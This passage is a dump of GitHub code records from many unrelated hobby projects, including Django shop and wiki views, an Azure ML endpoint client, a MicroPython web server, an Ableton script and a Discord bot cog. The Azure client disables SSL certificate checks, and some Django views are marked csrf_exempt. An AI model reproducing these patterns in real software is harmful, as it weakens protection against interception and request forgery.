sale_order:\n for line in order.order_line:\n if line.delivery_date == rec.delivery_date and \\\n line.slot == rec.slot:\n rec.delivery_ids = [(4, order.id)]\n\n\nclass SlotTime(models.Model):\n \"\"\"Model to create time slots\"\"\"\n _name = 'slot.time'\n\n name = fields.Char('Slot')\n slot_type = fields.Selection([('home', 'Home Hours'),\n ('office', 'Office Hours')])\n time_from = fields.Selection([\n ('0', '12:00 AM'),\n ('1', '1:00 AM'),\n ('2', '2:00 AM'),\n ('3', '3:00 AM'),\n ('4', '4:00 AM'),\n ('5', '5:00 AM'),\n ('6', '6:00 AM'),\n ('7', '7:00 AM'),\n ('8', '8:00 AM'),\n ('9', '9:00 AM'),\n ('10', '10:00 AM'),\n ('11', '11:00 AM'),\n ('12', '12:00 PM'),\n ('13', '1:00 PM'),\n ('14', '2:00 PM'),\n ('15', '3:00 PM'),\n ('16', '4:00 PM'),\n ('17', '5:00 PM'),\n ('18', '6:00 PM'),\n ('19', '7:00 PM'),\n ('20', '8:00 PM'),\n ('21', '9:00 PM'),\n ('22', '10:00 PM'),\n ('23', '11:00 PM')], string='Time From')\n time_to = fields.Selection([\n ('0', '12:00 AM'),\n ('1', '1:00 AM'),\n ('2', '2:00 AM'),\n ('3', '3:00 AM'),\n ('4', '4:00 AM'),\n ('5', '5:00 AM'),\n ('6', '6:00 AM'),\n ('7', '7:00 AM'),\n ('8', '8:00 AM'),\n ('9', '9:00 AM'),\n ('10', '10:00 AM'),\n ('11', '11:00 AM'),\n ('12', '12:00 PM'),\n ('13', '1:00 PM'),\n ('14', '2:00 PM'),\n ('15', '3:00 PM'),\n ('16', '4:00 PM'),\n ('17', '5:00 PM'),\n ('18', '6:00 PM'),\n ('19', '7:00 PM'),\n ('20', '8:00 PM'),\n ('21', '9:00 PM'),\n ('22', '10:00 PM'),\n ('23', '11:00 PM')], string='Time To')\n","repo_name":"muhsinavalappan/MyProjects","sub_path":"delivery_slot/models/delivery_slot.py","file_name":"delivery_slot.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8192600833","text":"from django.shortcuts import render\nfrom .models import Product\n\n# Create your views here.\ndef list(request):\n get_product = Product.objects\n query = request.GET.get('query','')\n if query:\n get_product = get_product.filter(name__icontains=query)\n context = {\n 'get_product' : get_product\n }\n return render(request, 'list.html', context)\n\ndef prodinfo_view(request, product_pk):\n prod = Product.objects.get(pk=product_pk)\n context = {\n 'prod': prod\n }\n return render(request, 'prodinfo.html', context)","repo_name":"cruzey/tyshop01","sub_path":"tyadmins/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30257129401","text":"from math import sqrt\n\ndef distancia_sh(pontos, n):\n pontos.sort(key=lambda x:x[0])\n return sqrt(distancia_rec_sh(pontos, 0, n-1))\n\ndef distancia_rec_sh(pontos, p, r):\n if r <= p + 2:\n return forca_bruta(pontos, p, r)\n q = (p + r)//2\n de = distancia_rec_sh(pontos, p, q)\n dd = distancia_rec_sh(pontos, q + 1, r)\n intercale(pontos, p, q, r)\n return combine(pontos, pontos[q][0], p, r, de, dd)\n\ndef forca_bruta(pontos, p, r):\n dist2 = 100000000\n brute = pontos[p:r+1]\n brute.sort(key=lambda x:x[1])\n\n for i in range(p, r+1):\n pontos[i] = brute[i-p]\n\n for i in range(p, r+1):\n for j in range(i+1, r+1):\n aux = distancia2(pontos[i], pontos[j])\n if aux < dist2:\n dist2 = aux\n return dist2\n\ndef distancia2(a, b):\n return (b[0] - a[0])**2 + (b[1] - a[1])**2\n\ndef intercale(pontos, p, q, r):\n i = p \n j = q + 1\n intercalado = []\n\n while i <= q and j <= r:\n while i <= q and pontos[i][1] <= pontos[j][1]:\n intercalado.append(pontos[i])\n i += 1\n\n while j <= r and pontos[j][1] <= pontos[i][1]:\n intercalado.append(pontos[j])\n j += 1\n \n while i <= q:\n intercalado.append(pontos[i])\n i += 1\n\n while j <= r:\n intercalado.append(pontos[j])\n j += 1\n \n for i in range(p, r+1):\n pontos[i] = intercalado[i-p]\n\ndef combine(pontos, x, p, r, de, dd):\n d = min(de,dd)\n (f,t) = candidatos(pontos, x, p, r, d)\n for i in range(t):\n for j in range(i+1, min(i+7, t)):\n dlinha = distancia2(f[i], f[j])\n if dlinha < d:\n d = dlinha\n return d\n\ndef candidatos(pontos, x, p, r, d):\n t = 0\n f = []\n for k in range(p, r+1):\n if abs(x - pontos[k][0]) * abs(x - pontos[k][0]) < d:\n f.append(pontos[k])\n t += 1\n return f, t\n\ndef main():\n n = int(input())\n while n != 0:\n pontos = []\n for i in range(n):\n coord = input().split()\n x = int(coord[0])\n y = int(coord[1])\n pontos.append((x,y))\n d = distancia_sh(pontos, n)\n if d >= 10000:\n print(\"INFINITY\")\n else: \n print(format(d, '.4f'))\n n = int(input())\n\nmain()\n","repo_name":"danigfavero/geometria-computacional","sub_path":"vjudge/closest_pair.py","file_name":"closest_pair.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39758997574","text":"# Referenced from https://gist.github.com/aallan/3d45a062f26bc425b22a17ec9c81e3b6\nimport network\nimport socket\nimport time\n\nfrom machine import Pin\n\nimport uasyncio as asyncio\n\nfrom status_display import StatusDisplay\n\nclass AsyncWebServer:\n \n def __init__(self, temp_sensor, light_sensor, wlan, background_task, background_interval_sec, status_display, port=80):\n \"\"\"\n wlan isn't used directly but can be queried for status on failure\n \"\"\"\n \n self.onboard = Pin(\"LED\", Pin.OUT, value=0)\n \n self.temp_sensor = temp_sensor\n self.light_sensor = light_sensor\n \n self.wlan = wlan\n \n self.background_task = background_task\n self.background_interval_sec = background_interval_sec\n \n self.status_display = status_display\n \n self.port = port\n \n self.host='0.0.0.0'\n \n self.template = self.read_page_template()\n \n print(f\"Server will run on wlan address {self.wlan.ifconfig()[0]} and on port {self.port}\")\n print(f\"Startup page params are {self.get_page_params()}\")\n \n def read_page_template(self, template=\"index.html\"):\n template = \"Error reading page.\"\n \n with open('index.html', 'r') as file:\n template = file.read()\n \n return template\n \n def web_page(self, params: dict):\n \n temperature = params['temperature']\n light = params['light']\n time = params['time']\n \n html = self.template.format(temperature=temperature, light=light, time=time)\n return html\n \n def get_page_params(self):\n \n temperature = self.temp_sensor.take_measurement()\n light = self.light_sensor.take_measurement()\n lt = time.localtime()\n timestamp = f\"{lt[0]}/{lt[1]}/{lt[2]} {lt[3]}:{lt[4]}:{lt[5]}\"\n \n params = {'temperature': temperature, 'light': light, 'time': timestamp}\n \n return params \n\n async def serve_client(self, reader, writer):\n print(\"Client connected\")\n request_line = await reader.readline()\n print(\"Request:\", request_line)\n # We are not interested in HTTP request headers, skip them\n while await reader.readline() != b\"\\r\\n\":\n pass\n \n params = self.get_page_params() \n response = self.web_page(params)\n\n writer.write('HTTP/1.0 200 OK\\r\\nContent-type: text/html\\r\\n\\r\\n')\n writer.write(response)\n\n await writer.drain()\n await writer.wait_closed()\n print(\"Client disconnected\")\n\n \"\"\"\n I hereby acknowledge the hacky arrangement of the background task hosting here\n \"\"\"\t\n async def run_server(self):\n\n print('Setting up webserver...')\n asyncio.create_task(asyncio.start_server(self.serve_client, self.host, self.port))\n while True:\n print(\"Webserver executing background task\")\n await self.background_task()\n print(\"Background task completed\")\n self.status_display.flash_all(0.25)\n await asyncio.sleep(self.background_interval_sec)\n \nif __name__ == \"__main__\":\n # local test\n\n import main\n wlan = main.connect_wifi()\n status_display = StatusDisplay(main.led_config)\n \n class MockSensor:\n def take_measurement(self):\n return {\"temperature\": 83.1, \"humidity\": 38}\n \n temp_sensor = MockSensor()\n light_sensor = MockSensor()\n \n async def say_hello():\n print(\"Hello from the background\")\n \n ws = AsyncWebServer(temp_sensor=temp_sensor, light_sensor=light_sensor, wlan=wlan, background_task=say_hello, status_display=status_display, background_interval_sec=10)\n \n try:\n asyncio.run(ws.run_server())\t\n finally:\n print(\"Shutting it down...\")\n asyncio.new_event_loop()","repo_name":"johnekent/greenhouse-iot","sub_path":"pico/async_web_server.py","file_name":"async_web_server.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19279199180","text":"#!/usr/bin/python3\n\"\"\"\n This is a module to add two integers supplied only as\n an integer or as a float.\n\"\"\"\n\n\ndef add_integer(a, b=98):\n \"\"\"\n A function to add two numbers.\n \"\"\"\n if type(a) not in [int, float]:\n raise TypeError(\"a must be an integer\")\n if type(b) not in [int, float]:\n raise TypeError(\"b must be an integer\")\n a, b = int(a), int(b)\n return a + b\n","repo_name":"BrightOlawale/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/0-add_integer.py","file_name":"0-add_integer.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29923069186","text":"from cgitb import text\nimport imp\nfrom turtle import title\nfrom django.http import HttpResponse\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.http import HttpResponse\nimport markdown\nfrom .models import WikiPage, SubTopic\nfrom .forms import NewPageForm, NewSubTopicForm\nfrom django.contrib.auth.models import User\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import UpdateView\n\n\n\n\n# Create your views here.\n\n\ndef home(request):\n t = '#**hello** my *friend*'\n\n return render(request,'home.html')\n\n\ndef ViewWikiPage(request,title):\n #page = WikiPage.objects.get(title=title)\n page = get_object_or_404(WikiPage, title=title)\n page_text = page.get_text()\n # topics = page.subtopics.all()\n topics = page.subtopics.all()\n\n # for t in topics:\n # topics_text[t.title] = markdown.markdown(t.text)\n\n return render(request,'pageview.html',{'page':page,'page_text':page_text,'topics':topics})\n\n@csrf_exempt\ndef NewPage(request):\n #user = request.user\n if request.method == 'POST':\n form = NewPageForm(request.POST)\n if form.is_valid():\n page = form.save(commit=False)\n #page.created_by = user\n page.save()\n # return redirect('wikipage',tittle=page.title)\n return redirect('home')\n else:\n form = NewPageForm()\n return render(request,'newpage.html',{'form': form})\n\n@csrf_exempt\ndef AddSubTopic(request,title):\n user = request.user\n page = get_object_or_404(WikiPage,title = title)\n if request.method == 'POST':\n form = NewSubTopicForm(request.POST)\n if form.is_valid():\n topic = form.save(commit=False)\n topic.created_by = user\n topic.topic = page\n topic.save()\n return redirect('wikipage',title=title)\n else:\n form = NewSubTopicForm()\n page = get_object_or_404(WikiPage, title=title)\n page_text = page.get_text()\n # topics = page.subtopics.all()\n topics = page.subtopics.all()\n return render(request, 'newtopic.html', {'form':form, 'page':page,'page_text':page_text,'topics':topics})\n\n\nclass SubTopicEdit(UpdateView):\n model = SubTopic\n fields = ('text', )\n template_name = 'edit_topic.html'\n pk_url_kwarg = 'topic_pk'\n context_object_name = 'post'\n\n def form_valid(self, form):\n post = form.save(commit=False)\n post.save()\n\n return redirect('wikipage',title=post.topic.title)","repo_name":"uprm-inso-4117-2021-2022-s2/semester-project-team-9","sub_path":"WikiRum/wiki/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"42682575650","text":"import pytest\nfrom modules.accounts.application.interfaces import IClientRepository\nfrom modules.accounts.domain.models import Client, Account, User\nfrom modules.accounts.application.dto import AccountDTO\nfrom modules.accounts.domain.value_objects import Currencies\nfrom typing import List, Union\nfrom decimal import Decimal\n\n\n@pytest.fixture\ndef account_fixture():\n return (\n AccountDTO(\n user_id=1,\n default_currency=Currencies.EUR,\n number=123456789012,\n balance=Decimal(\"1000.00\"),\n ),\n AccountDTO(\n user_id=2,\n default_currency=Currencies.EUR,\n number=998765432109,\n balance=Decimal(\"500.00\"),\n ),\n )\n\n\ndef id_generator():\n id = 1\n while True:\n yield id\n id += 1\n\n\nclass MockClientRepository(IClientRepository):\n _users = dict()\n _accounts = dict()\n user_id_generator = id_generator()\n acc_id_generator = id_generator()\n\n def __enter__(self) -> None:\n pass\n\n def __exit__(self, *__args):\n pass\n\n def get_user(self, user_id: int) -> Client:\n data = self._users.get(user_id)\n client: Client = Client(user=data.get(\"user\"), accounts=data.get(\"accounts\"))\n return client\n\n def get_user_list(self) -> List[User]:\n result = list()\n for record in self._users.values():\n result.append(record.get(\"user\"))\n return result\n\n def create_account(self, account: Account) -> None:\n id = next(self.acc_id_generator)\n self._accounts[id] = account\n\n def get_account_list(self, user_id: int) -> List[Account]:\n result: List[Account] = [\n record for record in self._accounts if record.user_id == user_id\n ]\n return result\n\n def get_account(self, account_id: int) -> Union[Account, None]:\n return self._accounts.get(account_id)\n\n def get_account_by_number(self, account_number: int) -> Union[Account, None]:\n try:\n acc = list(filter(lambda x: x[\"number\"] == account_number, self._accounts))[\n 0\n ]\n except IndexError:\n acc = None\n return acc\n\n def delete_account(self, acc_id: int) -> None:\n if self._accounts.get(acc_id):\n del self._accounts[acc_id]\n\n def create_user(self, client: Client) -> None:\n id = next(self.user_id_generator)\n client.user.id = id\n client.accounts[0].user_id = id\n self._users[id] = {\"user\": client.user, \"accounts\": client.accounts}\n\n def delete_user(self, user_id: int) -> None:\n if self._users.get(user_id):\n del self._users[user_id]\n","repo_name":"szym0nplaza/bank-site-backend","sub_path":"src/modules/accounts/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1984809763","text":"import json\nimport os\nimport ssl\nimport typing\nimport urllib.error\nimport urllib.request\n\nfrom azureml.core import Workspace, Dataset\nfrom dotenv import load_dotenv\nfrom sklearn.preprocessing import StandardScaler\n\nfrom utils import start_action, end_action\n\nload_dotenv('.env')\n\n\ndef main():\n print()\n x_samples, y_samples = fetch_n_samples(n=20)\n\n pred_samples = predict_test_samples(x_samples)\n\n pretty_print_results(pred_samples, y_samples)\n\n\ndef fetch_n_samples(n: int) -> [list, list]:\n action_text = f'Fetch first {n} samples from test set'\n start_action(action_text)\n\n workspace = Workspace(\n os.getenv('SUBSCRIPTION_ID'),\n os.getenv('RESOURCE_GROUP'),\n os.getenv('AML_WORKSPACE_NAME')\n )\n\n train = Dataset.get_by_name(workspace, name='MNIST Database - Train Partition').to_pandas_dataframe()\n test = Dataset.get_by_name(workspace, name='MNIST Database - Test Partition').to_pandas_dataframe()\n\n first_n_samples = test.loc[0:(n - 1)]\n\n x_train = train.loc[:, train.columns != 'label']\n scaler = StandardScaler().fit(x_train)\n\n x_samples = scaler.transform(\n first_n_samples.loc[:, first_n_samples.columns != 'label']\n )\n y_samples = first_n_samples['label']\n\n end_action(action_text)\n return x_samples.tolist(), y_samples.values.tolist()\n\n\ndef predict_test_samples(x_samples: list) -> typing.Optional[list]:\n action_text = 'Predicting test samples using published endpoint'\n start_action(action_text)\n\n # bypass the server certificate verification on client side\n if not os.environ.get('PYTHONHTTPSVERIFY', '') and getattr(ssl, '_create_unverified_context', None):\n ssl._create_default_https_context = ssl._create_unverified_context\n\n data = {\"input_data\": x_samples}\n body = str.encode(json.dumps(data))\n\n request = urllib.request.Request(os.getenv('ENDPOINT_URL'), body, headers={\n 'Content-Type': 'application/json',\n 'Authorization': ('Bearer ' + os.getenv('ENDPOINT_API_KEY')),\n 'azureml-model-deployment': os.getenv('ENDPOINT_MODEL_DEPLOYMENT')\n })\n\n try:\n response = urllib.request.urlopen(request)\n end_action(action_text)\n return json.loads(response.read())\n except urllib.error.HTTPError as error:\n end_action(action_text, state='failure')\n print(f'\\nThe request failed with status code: {str(error.code)}')\n print(error.info())\n print(error.read().decode(\"utf8\", 'ignore'))\n quit(1)\n\n\ndef pretty_print_results(pred_samples, y_samples):\n print('\\n' +\n '┌───────┬────────────┐\\n' +\n '│ Label │ Prediction │\\n' +\n '├───────┼────────────┤')\n if pred_samples is not None:\n for label, prediction in zip(y_samples, pred_samples):\n success_label = '✅' if label == prediction else '❌'\n print(f'│ {label:<5} │ {prediction} │ {success_label}')\n print('└───────┴────────────┘')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"softawaregmbh/website-blog-aml-scripts","sub_path":"src/4_test_client.py","file_name":"4_test_client.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42778256391","text":"from __future__ import with_statement\nimport Live\nfrom _Framework.ControlSurface import ControlSurface\nfrom _Framework.ControlSurfaceComponent import ControlSurfaceComponent\nfrom _Framework.SubjectSlot import subject_slot\ntry:\n from .TrackDetector import TrackDetector\nexcept ImportError:\n from TrackDetector import TrackDetector\n\n\nclass Neova(ControlSurface):\n\n\t_track_detectors = []\n\t_current_track = None\n\n\tdef __init__(self, c_instance):\n\t\tControlSurface.__init__(self, c_instance)\n\t\twith self.component_guard():\n\t\t\tself.__c_instance = c_instance\n\n\t\tself._initialize_track_detectors()\n\t\tself._current_track = self.song().view.selected_track\n\t\tself._on_current_track_devices_changed.subject = self._current_track if self._current_track else None\n\n\t\t#self._show_tracks_description()\n\t\t#self._show_track_detectors()\n\t\t\n\tdef _show_tracks_description(self):\n\t\tlog_string = \"\\n[Current Tracks]\\n\"\n\n\t\tfor track in self.song().tracks:\n\t\t\tlog_string += (\" - \" + str(track.name)\n\t\t\t\t\t\t\t\t\t + (\" | Armed\" if (track.arm == 1) else \" | Not Armed\")\n\t\t\t\t\t\t\t\t\t + \" | Devices : \" + \"-\".join([device.name for device in track.devices])\n\t\t\t\t\t\t\t\t\t + \"\\n\")\n\t\tself.log_message (log_string)\n\n\tdef _show_track_detectors(self):\n\t\tlog_string = \"\\n[Current Detectors]\\n\"\n\n\t\tfor detector in self._track_detectors:\n\t\t\tlog_string += detector.to_string() + \"\\n\"\n\t\tself.log_message (log_string)\n\n\tdef _initialize_track_detectors(self):\n\t\twith self.component_guard():\n\t\t\tdel self._track_detectors[:]\n\t\t\tfor track in self.song().tracks:\n\t\t\t\tfor device in track.devices:\n\t\t\t\t\tif device.name == \"Plume\":\n\t\t\t\t\t\tself._track_detectors.append (TrackDetector(track))\n\n\tdef _update_track_detectors(self):\n\t\twith self.component_guard():\n\t\t\tself._remove_outdated_track_detectors()\n\n\t\t\tfor track in self.song().tracks:\n\t\t\t\tself._update_arm_detector_for_track(track)\n\n\tdef _track_has_plume(self, track_to_check):\n\t\tfor device in track_to_check.devices:\n\t\t\tif device.name == \"Plume\":\n\t\t\t\treturn True\n\t\treturn False\n\n\tdef _track_has_arm_detector(self, track_to_check):\n\t\tfor detector in self._track_detectors:\n\t\t\tif detector.track == track_to_check:\n\t\t\t\treturn True\n\t\treturn False\n\n\tdef _get_arm_detector_for_track(self, track_to_get_detector_for):\n\t\tfor detector in self._track_detectors:\n\t\t\tif detector.track == track_to_get_detector_for:\n\t\t\t\treturn detector\n\t\treturn None\n\n\tdef _get_arm_detector_id(self, track_to_get_detector_for):\n\t\tfor id in range(len(self._track_detectors)):\n\t\t\tif self._track_detectors[id].track == track_to_get_detector_for:\n\t\t\t\treturn id\n\t\treturn -1 #default value\n\n\tdef _update_arm_detector_for_track(self, track_to_update_detector_in):\n\t\tif ((not self._track_has_arm_detector(track_to_update_detector_in)) and self._track_has_plume(track_to_update_detector_in)):\n\t\t\t# New plume track needs a detector : appends detector to the list\n\t\t\tself._track_detectors.append (TrackDetector(track_to_update_detector_in))\n\n\t\telif (self._track_has_arm_detector(track_to_update_detector_in) and (not self._track_has_plume(track_to_update_detector_in))):\n\t\t\t# Former plume track no longer needs a detector: removes its detector from the list\n\t\t\tid_to_remove = self._get_arm_detector_id(track_to_update_detector_in)\n\t\t\tif id_to_remove != -1:\n\t\t\t\tself._track_detectors[id_to_remove].unbind_from_track()\n\t\t\t\tdel self._track_detectors[id_to_remove]\n\n\tdef _remove_outdated_track_detectors(self):\n\t\tfor detector in self._track_detectors:\n\t\t\tif not detector.track:\n\t\t\t\tself._track_detectors.remove (detector)\n\n\tdef _on_track_list_changed(self):\n\t\tself._update_track_detectors()\n\n\tdef _on_selected_track_changed(self):\n\t\tself._current_track = self.song().view.selected_track\n\t\tself._on_current_track_devices_changed.subject = self._current_track\n\n\t\twith self.component_guard():\n\t\t\tself._update_arm_detector_for_track(self._current_track)\n\n\t@subject_slot(\"devices\")\n\tdef _on_current_track_devices_changed(self):\n\t\twith self.component_guard():\n\t\t\tself._update_arm_detector_for_track(self._current_track)","repo_name":"Enhancia/DAW-Scripts-Plume","sub_path":"Ableton Live/Neova/Neova.py","file_name":"Neova.py","file_ext":"py","file_size_in_byte":3975,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"30053555576","text":"image = cv2.imread('brain1.jpg')\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\npixel_values = image.reshape((-1, 3)) #2D and 3 colors\npixel_values = np.float32(pixel_values) #making the matrix float\n#print(pixel_values.shape)\n\ncriteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.2) #define the criteria\n_, labels, centers = cv2.kmeans(pixel_values, 3, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS) #asking for 3 classes - black, white and grey\ncenters = np.uint8(centers)\nlabels = labels.flatten()\nfinal_image = centers[labels.flatten()]\n\nfinal_image = final_image.reshape(image.shape)\n\nplt.subplot(121)\nplt.imshow(image)\nplt.title('Original Image'), plt.xticks([]), plt.yticks([])\nplt.subplot(122)\nplt.imshow(final_image)\nplt.title('KNN (3) Image'), plt.xticks([]), plt.yticks([])\nplt.show()\n","repo_name":"nikkithags/Detection-and-Analysis-of-Alzheimer-s-disease","sub_path":"KnnImageSegmentation.py","file_name":"KnnImageSegmentation.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"29372584833","text":"\"\"\"Utility functions.\"\"\"\n\nimport logging\nimport os\nimport sys\n\n\ndef read_file(path):\n \"\"\"Read file contents and return it as a string.\"\"\"\n if path and os.path.exists(path):\n with open(path, \"r\") as file_handle:\n data = file_handle.read()\n else:\n data = \"\"\n return data\n\n\ndef setup_logger():\n \"\"\"Set a logger up with script name logging to STDERR.\"\"\"\n logger = logging.getLogger(os.path.basename(sys.argv[0]))\n logger.addHandler(logging.StreamHandler(stream=sys.stderr))\n logger.setLevel(logging.DEBUG)\n return logger\n","repo_name":"sanjaz/lazypr","sub_path":"lazypr/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"13223551811","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.ProductList.as_view(), name='create_order'),\n path('', views.ViewProduct.as_view(), name='list_order'),\n path('admin/', views.AdminCreateProduct.as_view()),\n path('admin//', views.AdminManageProduct.as_view()), \n]\n","repo_name":"lawalkeyd/Ecommerce","sub_path":"products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6669380329","text":"import discord\nfrom discord.ext import commands\nfrom discord.ext.commands.cooldowns import BucketType\nimport random\n\n\nclass Giveaway:\n def __init__(self, bot):\n self.bot = bot\n self.giveaways = {}\n\n def __str__(self):\n return self.__class__.__name__\n\n async def __local_check(self, ctx):\n return ctx.guild is not None\n\n @commands.command(aliases=[\"startgiveaway\", 'startgw'])\n @commands.has_permissions(manage_messages=True)\n async def opengiveaway(self, ctx):\n \"\"\"Opens a giveaway\n\n The bot will send a message and everyone who reacts to the message is entered. Each user can only enter once\n regardless of how many reactions they add. Each person can only host 1 giveaway at a time per guild.\n\n \"\"\"\n if ctx.guild not in self.giveaways:\n self.giveaways[ctx.guild] = {}\n message = await ctx.send(\"**Giveaway open, everyone who reacts to this message with any reaction \"\n \"is entered, each user is only counted once**\")\n self.giveaways[ctx.guild][ctx.author] = message\n elif ctx.author in self.giveaways[ctx.guild]:\n await ctx.send(\n \"I can only hold 1 giveaway per person, end your current giveaway to start a new one\")\n\n @commands.command(aliases=['stopgiveaway', 'stopgw'])\n @commands.has_permissions(manage_messages=True)\n async def closegiveaway(self, ctx):\n \"\"\"Closes the giveaway, you can only close your own giveaways. This does used for preventing further entries\"\"\"\n if ctx.author in self.giveaways[ctx.ctx.guild]:\n updated_message = await ctx.channel.get_message(self.giveaways[ctx.guild][ctx.author].id)\n entered_users = []\n for reaction in updated_message.reactions:\n users = await reaction.users().flatten()\n entered_users.extend(users)\n self.giveaways[ctx.author] = entered_users\n try:\n await updated_message.clear_reactions()\n except discord.Forbidden:\n pass\n await ctx.send(\"Giveaway closed,any reactions added now will no longer count\")\n\n @commands.command()\n @commands.has_permissions(manage_messages=True)\n async def giveawaychoose(self, ctx):\n \"\"\"Chooses from the pool of entries and announces the winner. You can keep using this command\"\"\"\n if ctx.author in self.giveaways[ctx.guild]:\n await ctx.send(f\"Congratulations: {random.choice(self.giveaways[ctx.author]).mention}!\")\n\n\ndef setup(bot):\n bot.add_cog(Giveaway(bot))\n","repo_name":"LucasCoderT/Iceteabot-old","sub_path":"src/discord/cogs/giveaway.py","file_name":"giveaway.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30359847051","text":"from qtpy.QtWidgets import QDataWidgetMapper, QCheckBox, QRadioButton, QSlider, QComboBox, QDial\n\n\nclass ExtDataWidgetMapper(QDataWidgetMapper):\n \"\"\"This class exists because QDataWidgetMapper doesn't map QCheckBox properly to a data model.\n The reason for this is that QDataWidgetMapper relies on its delegate (QStyledItemDelegate by\n default) to emit the signal commitData when editing is finished. Unfortunately,\n QStyledItemDelegate doesn't emit this signal for all widgets such as, for example QCheckBox\n and so we handle these widgets by manually triggering the commitData signal to emit from\n our delegate when one of these unhandled widgets updates.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def addMapping(self, widget, section, property=None):\n if isinstance(widget, (QCheckBox, QRadioButton)):\n widget.toggled.connect(lambda: self.itemDelegate().commitData.emit(widget))\n elif isinstance(widget, QSlider):\n widget.valueChanged.connect(lambda: self.itemDelegate().commitData.emit(widget))\n elif isinstance(widget, QDial):\n widget.valueChanged.connect(lambda: self.itemDelegate().commitData.emit(widget))\n elif isinstance(widget, QComboBox):\n widget.currentTextChanged.connect(lambda: self.itemDelegate().commitData.emit(widget))\n\n if property is not None:\n super().addMapping(widget, section, property)\n else:\n super().addMapping(widget, section)\n\n def setItemDelegate(self, delegate):\n # after calling super().setItemDelegate, we need to find all of the QCheckBox\n # widgets and connect them to the new delegate. Also we should disconnect from\n # the old one. How do we find the list of mapped widgets?\n raise NotImplementedError('FIXME: implement this call')","repo_name":"maierman/pyQtAbstractDescriptor","sub_path":"lib/ExtDataWidgetMapper.py","file_name":"ExtDataWidgetMapper.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"39928513364","text":"import sys\ninput = sys.stdin.readline\n \ndef inInt():\n return int(input())\n \ndef inStr():\n return input().strip(\"\\n\")\n \ndef inIList():\n return(list(map(int,input().split())))\n \ndef inSList():\n return(input().split())\n \ndef bsearch(nums, target):\n N = len(nums or [])\n l = 0\n r = N - 1\n \n while l <= r:\n mid = ((l + r) // 2)\n if nums[mid] < target:\n l = mid + 1\n elif nums[mid] > target:\n r = mid - 1\n else:\n return (None, mid, None)\n \n return (r if r >= 0 else None, None, l if l <= N-1 else None)\n \ndef yesOrNo(val):\n print(\"YES\" if val else \"NO\")\n \n \ndef solve():\n n = inInt()\n s = inStr()\n ans = \"\"\n for i in range(n):\n sub = s[i:i + n]\n for j in range(len(ans)):\n if sub[j] == ans[j]:\n break\n else:\n ans += sub[len(ans)]\n ans += \"0\" * (n - len(ans))\n print(ans)\ntests = inInt()\nfor case in range(tests): \n solve()","repo_name":"raymon-zhang/cp","sub_path":"CodeForces/PyPy 3/1400A | String Similarity/90926808.py","file_name":"90926808.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42333803766","text":"import numpy as np\nimport pandas as pd\nimport itertools\nimport peakutils\nfrom scipy.stats.kde import gaussian_kde\n\n__all__ = ['Bootlier', 'boot', 'Hratio', 'find_hratio', 'find_outliers']\n\n\ndef _part(n, k):\n \"\"\"Integer partitioning\n from https://stackoverflow.com/questions/18503096/python-integer-partitioning-with-given-k-partitions\n \"\"\"\n def _kpart(n, k, pre):\n if n <= 0:\n return []\n if k == 1:\n if n <= pre:\n return [[n]]\n return []\n ret = []\n for i in range(min(pre, n), 0, -1):\n ret += [[i] + sub for sub in _kpart(n-i, k-1, i)]\n return ret\n return _kpart(n, k, n)\n\n\nclass Bootlier(object):\n \"\"\"Samples and MTM for a list of points for bootlier.\"\"\"\n\n def __init__(self, npoints, z, b, k):\n df = self._make_samples(npoints, z, b)\n df = self._calc_means(df)\n df = self._calc_trimmed_means(df, k)\n self.samples = df\n\n def _make_samples(self, npoints, z, b):\n samples = pd.DataFrame(columns=['sample'])\n for i in range(b):\n sample = [np.random.choice(npoints, size=z, replace=True)]\n samples.loc[i] = sample\n return samples\n\n def _calc_means(self, samples):\n samples['mean'] = samples['sample'].apply(lambda x: np.mean(x))\n return samples\n\n def _calc_trimmed_means(self, samples, k):\n 